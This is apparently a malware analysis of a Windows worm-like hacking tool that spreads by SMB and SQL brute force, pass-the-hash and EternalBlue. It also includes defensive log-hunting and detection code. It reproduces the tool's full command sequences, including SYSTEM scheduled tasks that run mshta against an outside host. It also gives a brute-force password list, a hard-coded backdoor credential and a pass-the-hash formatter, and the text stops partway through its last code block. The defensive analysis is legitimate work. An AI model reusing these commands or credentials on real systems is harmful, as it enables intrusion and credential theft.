Analysis by: Jay Bradley Nebre

ALIASES:

Trojan:Win32/InjectPyinc!rfn(Microsoft); Trojan.Win32.Trickster.dzg(Kaspersky)

 PLATFORM:

Windows

  • Threat Type: Hacking Tool

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel: Dropped by other malware, Downloaded from the Internet

This Hacking Tool arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It takes advantage of the SMBv1 vulnerability addressed by MS17-010 (EternalBlue) to reach other machines on the network.

  TECHNICAL DETAILS

File Size: 6,967,008 bytes
File Type: EXE
Memory Resident: Yes
Initial Samples Received Date: 26 Mar 2019
Payload: Connects to URLs/IPs, Exploits vulnerability

Arrival Details

This Hacking Tool arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Hacking Tool drops the following files:

  • {Malware Path}\mkatz.ini - mimikatz note

It drops and executes the following files:

  • {Malware Path}\m2.ps1 - detected as Trojan.PS1.MIMIKATZ.ADW

It adds the following processes:

  • {malware name}.exe
  • cmd /c wmic ntdomain get domainname
  • wmic ntdomain get domainname
  • cmd /c net localgroup administrators
  • net localgroup administrators
  • C:\Windows\system32\net1 localgroup administrators
  • cmd /c net group "domain admins" /domain
  • net group "domain admins" /domain
  • C:\Windows\system32\net1 group "domain admins" /domain
  • powershell.exe -exec bypass "import-module {malware path}\m2.ps1

Other Details

This Hacking Tool reports to the following possibly malicious URLs (the query string carries the host identity, the harvested credentials and the file it took them from):

  • http://{BLOCKED}o.{BLOCKED}g.com/e.png?id={Computer Name}&mac={MAC Address}&OS={OS Version}&BIT={32/64}&IT={Date and Time}&c={Counter}&VER={Malware Version}&d={SMBdomain}&from={Textfilesource}&mpass={Password}&size={Size of file}&num={no.}&sa={sqlpassword}&dig={0/1}&mdl={0/1}
  • http://{BLOCKED}o.{BLOCKED}h.com/e.png?id={Computer Name}&mac={MAC Address}&OS={OS Version}&BIT={32/64}&IT={Date and Time}&c={Counter}&VER={Malware Version}&d={SMBdomain}&from={Textfilesource}&mpass={Password}&size={Size of file}&num={no.}&sa={sqlpassword}&dig={0/1}&mdl={0/1}
  • http://{BLOCKED}o.{BLOCKED}y.com/e.png?id={Computer Name}&mac={MAC Address}&OS={OS Version}&BIT={32/64}&IT={Date and Time}&c={Counter}&VER={Malware Version}&d={SMBdomain}&from={Textfilesource}&mpass={Password}&size={Size of file}&num={no.}&sa={sqlpassword}&dig={0/1}&mdl={0/1}
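Because the check-in request carries the stolen credentials in mpass and sa, these URLs are worth hunting for in proxy logs even after the hosts are cleaned. The following is an added example, not code from the original analysis: it parses constructed squid-style log lines (timestamp, client, method, URL), recognises the beacon by the parameter set listed above, and reports each hit with the secret fields redacted. The hostnames are placeholders, since the real domains are blocked out on this page.

```python
"""Hunt for this tool's check-in requests in proxy logs (added example)."""
from urllib.parse import urlsplit, parse_qs

# Parameter names taken from the check-in URLs listed on the page.
BEACON_PARAMS = {"id", "mac", "OS", "BIT", "IT", "c", "VER", "d", "from",
                 "mpass", "size", "num", "sa", "dig", "mdl"}
# Fields that carry harvested secrets; never paste these into a ticket.
SECRET_PARAMS = {"mpass", "sa"}

# Constructed sample log lines (placeholder hosts, not the real C2 domains).
SAMPLE_LOG = """\
1553587200.101 10.0.0.5 GET http://example-redacted.invalid/e.png?id=WS01&mac=00-11-22-33-44-55&OS=6.1&BIT=64&IT=2019-03-26+08:00:00&c=3&VER=1.2&d=CORP&from=doadmin.txt&mpass=Passw0rd!&size=6967008&num=7&sa=sa123&dig=1&mdl=0
1553587201.220 10.0.0.7 GET http://www.example.com/images/e.png?v=2
1553587202.330 10.0.0.9 GET http://cdn.example.net/e.png?id=WS02&mac=aa-bb-cc-dd-ee-ff&OS=10.0&BIT=64&IT=2019-03-26+08:00:02&c=1&VER=1.2&d=&from=&mpass=&size=0&num=0&sa=&dig=0&mdl=1
"""


def parse_beacon(url):
    """Return the beacon's fields as a dict, or None if the URL is not a beacon."""
    parts = urlsplit(url)
    if not parts.path.endswith("/e.png"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    # Demand most of the tool's parameter names so ordinary e.png hits are ignored.
    if len(BEACON_PARAMS & set(qs)) < 10:
        return None
    return {k: v[0] for k, v in qs.items()}


def hunt(log_text):
    """Return (client_ip, redacted_fields, credential_exfiltrated) per beacon."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        beacon = parse_beacon(url)
        if beacon is None:
            continue
        exfiltrated = bool(beacon.get("mpass") or beacon.get("sa"))
        redacted = {k: ("<redacted>" if k in SECRET_PARAMS and v else v)
                    for k, v in beacon.items()}
        hits.append((client, redacted, exfiltrated))
    return hits


if __name__ == "__main__":
    for client, fields, exfil in hunt(SAMPLE_LOG):
        print(client, "credential stolen" if exfil else "no credential", fields["id"], fields["from"])
```

The `from` field names the marker file (doadmin.txt, ipc.txt, hash.txt, 143.txt, eb.txt) the tool wrote on the victim, so it tells you which access path succeeded on that host; the `d` field gives the SMB domain the credential belongs to, which is the scope for a password reset.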

It does the following:

  • This hack tool attempts to log in to target machines over SMB and SQL Server using the following usernames and passwords:
    Usernames:
    • Administrator
    • user
    • admin
    • test
    • hp
    • guest

    Passwords:
    • 123456
    • password
    • qwerty
    • 12345678
    • 123456789
    • 123
    • 1234
    • 123123
    • 12345
    • 12345678
    • 123123123
    • 1234567890
    • 88888888
    • 111111111
    • 000000
    • 111111
    • 112233
    • 123321
    • 654321
    • 666666
    • 888888
    • a123456
    • 123456a
    • 5201314
    • 1qaz2wsx
    • 1q2w3e4r
    • qwe123
    • 123qwe
    • a123456789
    • 123456789a
    • baseball
    • dragon
    • football
    • iloveyou
    • password
    • sunshine
    • princess
    • welcome
    • abc123
    • monkey
    • !@#$%^&*
    • charlie
    • aa123456
    • Aa123456
    • admin
    • homelesspa
    • password1
    • 1q2w3e4r5t
    • qwertyuiop
    • 1qaz2wsx
    • sa
    • sasa
    • sa123
    • sql2005
    • 1
    • admin@123
    • sa2008
    • 1111
    • passw0rd
    • abc
    • abc123
    • abcdefg
    • sapassword
    • Aa12345678
    • ABCabc123
    • sqlpassword
    • 1qaz2wsx
    • 1qaz!QAZ
    • sql2008
    • ksa8hd4,m@~#$%^&*()
    • 4yqbm4,m`~!@~#$%^&*(),.;
    • 4yqbm4,m`~!@~#$%^&*(),.;
    • A123456
    • database
    • saadmin
    • sql2000
    • admin123
    • p@ssword
    • sql123
    • sasasa
    • adminsa
    • sql2010
    • sa12345
    • sa123456
    • saadmin
    • sqlpass
  • Depending on how it gained access to a target, the tool executes one of the following command sequences on that target:
    SMB domain admin access
    (Authenticates with a domain administrator credential the tool has collected: domain, username and password.)
    • cmd.exe /c echo {random filename} >> c:\windows\temp\svchost.exe
    • echo "*" >c:\windows\temp\doadmin.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • copy /y c:\windows\temp\svchost.exe c:\windows\{random filename}.exe
    • if exist c:\windows\temp\dig.exe (move /y c:\windows\temp\dig.exe c:\windows\{random filename}.exe)else echo no dig
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\Windows\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random filename}" /tr "c:\windows\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN escan)

    SMB user access
    (Authenticates with a username and password, without a domain.)
    • cmd.exe /c echo {random filename} >> c:\windows\temp\svchost.exe
    • echo "*" >c:\windows\temp\ipc.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • copy /y c:\windows\temp\svchost.exe c:\windows\{random filename}.exe
    • move /y c:\windows\temp\dig.exe c:\windows\{random filename}.exe
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\Windows\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random filename}" /tr "c:\windows\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN escan)

    SMB domain access
    (Authenticates with a domain username and password.)
    • cmd.exe /c echo {random filename} >> c:\windows\temp\svchost.exe
    • echo "*" >c:\windows\temp\domain.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • copy /y c:\windows\temp\svchost.exe c:\windows\{random filename}.exe
    • move /y c:\windows\temp\dig.exe c:\windows\{random filename}.exe
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\Windows\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random filename}" /tr "c:\windows\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN escan)

    SMB NT hash (pass-the-hash) access
    (Authenticates with a username and NT hash only; the hash is supplied in LM:NT form with an all-zero LM half, 00000000000000000000000000000000:{NT hash}, so no plaintext password is needed.)
    • cmd.exe /c echo {random filename} >> c:\windows\temp\svchost.exe
    • echo "*" >c:\windows\temp\hash.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • copy /y c:\windows\temp\svchost.exe c:\windows\{random filename}.exe
    • move /y c:\windows\temp\dig.exe c:\windows\{random filename}.exe
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\Windows\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random filename}" /tr "c:\windows\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN escan)

    SQL access
    (The call is made with the hard-coded credential k8h3d / k8d3j9SjfS7; note that the sequence also removes the local account k8h3d with net user /del.)
    • cmd.exe /c echo {random filename} >> c:\windows\temp\svchost.exe
    • echo "*" >c:\windows\temp\143.txt
    • copy /y c:\windows\temp\svchost.exe c:\windows\{random filename}.exe
    • move /y c:\windows\temp\dig.exe c:\windows\{random filename}.exe
    • net start Ddriver
    • net user k8h3d /del
    • netsh firewall add portopening tcp 65533 DNSsql
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\Windows\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random filename}" /tr "c:\windows\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN escan)

    MS17-010 exploit access
    ({ebsname} below is a scheduled-task name generated by the tool. The commands are first echoed into c:\windows\temp\p.bat, which is then executed.)
    • cmd /c echo {random filename} >> c:\windows\temp\msInstall.exe
    • echo copy /y c:\windows\temp\msInstall.exe c:\windows\{random filename}.exe>c:/windows/temp/p.bat
    • echo "*" >c:\windows\temp\eb.txt
    • echo move /y c:\windows\temp\{random filename}.exe c:\windows\ >>c:/windows/temp/p.bat
    • echo netsh interface ipv6 install >>c:/windows/temp/p.bat
    • echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat
    • echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat
    • echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat
    • echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat
    • echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random filename}" /tr "c:\windows\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn {ebsname} /tr "c:\windows\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN Autostart
    • schtasks /delete /TN Autoload /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"
    • schtasks /run /TN Autoload
    • schtasks /delete /TN {ebsname} /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN {ebsname} /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN {ebsname}) >>c:/windows/temp/p.bat
    • echo net start Ddriver >>c:/windows/temp/p.bat
    • echo for /f %%i in ('tasklist | find /c /i "cmd.exe"') do set s=%%i >>c:/windows/temp/p.bat
    • echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat
    • echo net user k8h3d /del >>c:/windows/temp/p.bat
    • echo c:\windows\{random filename}.exe >>c:/windows/temp/p.bat
    • echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat
    • echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat
    • cmd.exe /c c:/windows/temp/p.bat
    • cmd /c c:\windows\temp\installed.exe

    MS17-010 access
    (Same as the sequence above except that p.bat does not launch c:\windows\{random filename}.exe directly; {ebsname} is again a task name generated by the tool.)
    • cmd /c echo {random filename} >> c:\windows\temp\msInstall.exe
    • echo copy /y c:\windows\temp\msInstall.exe c:\windows\{random filename}.exe>c:/windows/temp/p.bat
    • echo "*" >c:\windows\temp\eb.txt
    • echo move /y c:\windows\temp\{random filename}.exe c:\windows\ >>c:/windows/temp/p.bat
    • echo netsh interface ipv6 install >>c:/windows/temp/p.bat
    • echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat
    • echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat
    • echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat
    • echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat
    • echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random filename}" /tr "c:\windows\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn {ebsname} /tr "c:\windows\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN Autostart
    • schtasks /delete /TN Autoload /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"
    • schtasks /run /TN Autoload
    • schtasks /delete /TN {ebsname} /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN {ebsname} /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN {ebsname}) >>c:/windows/temp/p.bat
    • echo net start Ddriver >>c:/windows/temp/p.bat
    • echo for /f %%i in ('tasklist | find /c /i "cmd.exe"') do set s=%%i >>c:/windows/temp/p.bat
    • echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat
    • echo net user k8h3d /del >>c:/windows/temp/p.bat
    • echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat
    • echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat
    • cmd.exe /c c:/windows/temp/p.bat
    • cmd /c c:\windows\temp\installed.exe

    EternalBlue access
    (The call is made with the hard-coded credential k8h3d / k8d3j9SjfS7; the sequence also removes the local account k8h3d.)
    • cmd.exe /c echo {random filename} >> c:\windows\temp\svchost.exe
    • echo "*" >c:\windows\temp\eb.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • net user k8h3d /del
    • copy /y c:\windows\temp\svchost.exe c:\windows\{random filename}.exe
    • move /y c:\windows\temp\dig.exe c:\windows\{random filename}.exe
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\Windows\{random filename}.exe" /F
    • schtasks /run /TN {random filename}
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random filename}" /tr "c:\windows\{random filename}.exe" /F
    • schtasks /run /TN {random filename}) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN Autostart
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\{random filename}.exe"
    • schtasks /run /TN escan)
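Whichever access path is used, the sequences above share a small set of fixed strings: the task names Autocheck, Autostart, Autoload, escan and \Microsoft\windows\Bluetool, a SYSTEM task that runs mshta against a URL, port proxies from 65531-65533 to port 53 with matching firewall rules, the k8h3d account, and the masquerading drop into c:\windows\temp as svchost.exe or msInstall.exe. The following added example, not part of the original analysis, turns those strings into detection rules and runs them over constructed process-creation events; the one-event-per-line CommandLine= format is an assumption about the log source.

```python
"""Flag process command lines matching this tool's lateral-movement sequence (added example)."""
import re

# Each rule is (name, regex); the patterns are derived from the command lists above.
RULES = [
    ("schtasks_system_mshta",
     re.compile(r"schtasks\s+/create\b.*?/ru\s+system\b.*?/tr\s+\"?cmd(?:\.exe)?\s+/c\s+mshta\s+http", re.I)),
    ("schtasks_known_task_name",
     re.compile(r"schtasks\s+/(?:create|run|delete)\b.*?/tn\s+\"?\\?(?:Autocheck|Autostart|Autoload|escan|Microsoft\\windows\\Bluetool)\b", re.I)),
    ("schtasks_system_powershell_encoded",
     re.compile(r"schtasks\s+/create\b.*?/ru\s+system\b.*?powershell\s+-ep\s+bypass\s+-e\s", re.I)),
    ("portproxy_to_dns",
     re.compile(r"netsh\s+interface\s+portproxy\s+add\s+v4tov4\s+listenport=6553[1-3]\s+connectaddress=\S+\s+connectport=53\b", re.I)),
    ("firewall_open_6553x",
     re.compile(r"netsh\s+firewall\s+add\s+portopening\s+tcp\s+6553[1-3]\s+DNS", re.I)),
    ("k8h3d_account",
     re.compile(r"net\s+user\s+k8h3d\b", re.I)),
    ("masquerade_drop_in_temp",
     re.compile(r"echo\s+\S+\s*>>\s*c:\\windows\\temp\\(?:svchost|msInstall)\.exe", re.I)),
    ("domain_admin_recon",
     re.compile(r"(?:wmic\s+ntdomain\s+get\s+domainname|net\s+group\s+\"domain admins\"\s+/domain|net\s+localgroup\s+administrators)", re.I)),
    ("mimikatz_module_load",
     re.compile(r"powershell(?:\.exe)?\s+-exec\s+bypass\s+\"?import-module\s+\S*m2\.ps1", re.I)),
]


def match_rules(cmdline):
    """Return the names of every rule the command line triggers, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_events(lines):
    """Parse key=value events and return (cmdline, [rule names]) for each hit."""
    hits = []
    for line in lines.splitlines():
        m = re.search(r"CommandLine=(.*)$", line)
        if not m:
            continue
        cmd = m.group(1).strip()
        names = match_rules(cmd)
        if names:
            hits.append((cmd, names))
    return hits


# Constructed sample events (four from the sequence above, two benign admin commands).
SAMPLE_EVENTS = r"""
EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c echo abcd1234 >> c:\windows\temp\svchost.exe
EventID=1 Image=C:\Windows\System32\netsh.exe CommandLine=netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
EventID=1 Image=C:\Windows\System32\schtasks.exe CommandLine=schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://redacted.invalid/page.html?pWS01"
EventID=1 Image=C:\Windows\System32\net.exe CommandLine=net user k8h3d /del
EventID=1 Image=C:\Windows\System32\schtasks.exe CommandLine=schtasks /query /tn "\Microsoft\Windows\Defrag\ScheduledDefrag"
EventID=1 Image=C:\Windows\System32\netsh.exe CommandLine=netsh interface portproxy show all
"""

if __name__ == "__main__":
    for cmd, names in scan_events(SAMPLE_EVENTS):
        print(", ".join(names), "<-", cmd)
```

The portproxy and firewall rules are the most durable indicators: a SYSTEM-created listener on 65531-65533 forwarding to 1.1.1.1:53 survives a reboot and has no legitimate reason to exist on a workstation, so `netsh interface portproxy show all` on a suspect host is a quick manual check.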
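The NT hash path authenticates with 00000000000000000000000000000000:{NT hash}, and the plaintext SMB and SQL paths rely on the wordlist earlier in this section, so a defender can check in advance whether that list would get the tool in by hashing it and comparing against a credential dump. The following is an added example, not code from the original analysis. It carries its own MD4, because hashlib's md4 is unavailable on many Python builds; the account dump is constructed and the wordlist subset uses only passwords that appear above.

```python
"""Audit a credential dump against this tool's password list (added example)."""
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (the NT hash is MD4 over the UTF-16LE password)."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def F(x, y, z):
        return (x & y) | (~x & z)

    def G(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def H(x, y, z):
        return x ^ y ^ z

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, rotl((a + G(b, c, d) + X[r2[i]] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """Windows NT hash, hex encoded."""
    return md4(password.encode("utf-16-le")).hex()


# The tool passes an all-zero LM half; the NTLM exchange only needs the NT half.
ZERO_LM = "0" * 32


def pth_credential(nthash: str) -> str:
    """Format an NT hash the way the tool's NT hash path supplies it (LM:NT)."""
    return f"{ZERO_LM}:{nthash.lower()}"


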